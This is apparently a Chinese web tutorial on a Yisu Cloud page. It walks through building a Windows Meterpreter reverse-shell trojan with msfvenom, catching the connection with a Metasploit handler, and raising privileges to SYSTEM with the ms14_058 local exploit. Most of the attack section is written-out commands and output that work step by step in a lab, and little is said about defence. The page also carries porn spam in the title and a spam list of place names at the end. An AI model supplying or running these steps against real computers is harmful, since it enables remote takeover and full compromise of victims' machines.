亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

大數據內網滲透中如何利用提權漏洞提升權限

發布時間:2021-12-10 09:25:06 來源:億速云 閱讀:120 作者:柒染 欄目:大數據

這篇文章給大家介紹大數據內網滲透中如何利用提權漏洞提升權限,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

環境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

一、生成木馬

1、查看Windows下可利用的payloads

msfvenom -l payloads | grep windows | grep tcp

大數據內網滲透中如何利用提權漏洞提升權限

2、選擇windows/meterpreter/reverse_tcp并生成木馬

-p 選擇一個payload

-l 載荷列表

-f 生成的文件格式

-e 編碼方式

-i 編碼次數

-b 在生成的程序中避免出現的值

-x 允許我們指定一個自定義的可執行文件作為模板,也就是將木馬捆綁到這個可執行文件上

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe

大數據內網滲透中如何利用提權漏洞提升權限

3、/root目錄下會生成一個aiyou.exe文件

大數據內網滲透中如何利用提權漏洞提升權限

二、通過Metasploit監聽小受

1、啟動Metasploit,use exploit/multi/handler

2、設置payload,set payload windows/meterpreter/reverse_tcp

3、設置監聽,set lhost 192.168.1.133

4、設置監聽端口,set lport 4444

5、run

大數據內網滲透中如何利用提權漏洞提升權限

6、將生成的aiyou.exe拷貝到小受中并運行,getuid查看權限,普通用戶

大數據內網滲透中如何利用提權漏洞提升權限

三、提權漏洞(ms14_058)

1、選擇提權漏洞:use exploit/windows/local/ms14_058_track_popup_menu

2、查看需要設置的參數:show options

大數據內網滲透中如何利用提權漏洞提升權限

3、設置session值:set session 1,執行run

大數據內網滲透中如何利用提權漏洞提升權限

4、重新生成一個session,查看權限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

關于大數據內網滲透中如何利用提權漏洞提升權限就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

罗甸县| 安宁市| 桃江县| 卓尼县| 呼伦贝尔市| 东光县| 武川县| 临汾市| 堆龙德庆县| 子洲县| 乐平市| 通化市| 左贡县| 台州市| 仁怀市| 嘉祥县| 泾阳县| 阿拉善左旗| 禄丰县| 建昌县| 襄樊市| 乌苏市| 图木舒克市| 启东市| 昌乐县| 小金县| 获嘉县| 晋城| 股票| 象州县| 杭州市| 个旧市| 奉贤区| 福泉市| 长葛市| 吴堡县| 合肥市| 壤塘县| 台东市| 康平县| 依兰县|